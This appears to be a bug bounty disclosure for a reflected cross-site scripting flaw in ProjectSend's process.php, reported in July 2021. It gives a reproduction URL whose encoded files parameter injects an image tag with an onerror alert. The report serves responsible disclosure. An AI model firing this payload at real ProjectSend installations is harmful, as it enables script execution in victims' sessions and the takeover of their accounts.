Cross-site Scripting (XSS) - Reflected in projectsend/projectsend
Valid
Reported on
Jul 2nd 2021
💥 BUG
reflected xss
💥 STEP TO REPRODUCE
1. Login to your account and visit url http://localhost/projectsend2/process.php?do=return_files_ids&files%5B0%5D%5Bname%5D=batch%5B%5D&files%5B0%5D%5Bvalue%5D=32%27%22%3E%3Cimg+src=x+onerror=alert()%3E
and see xss is executed
💥 IMPACT
Attacker can execute arbitary javascript in victim account using this xss
Occurrences
We have contacted a member of the
projectsend
team and are waiting to hear back
2 years ago
2 years ago
to join this conversation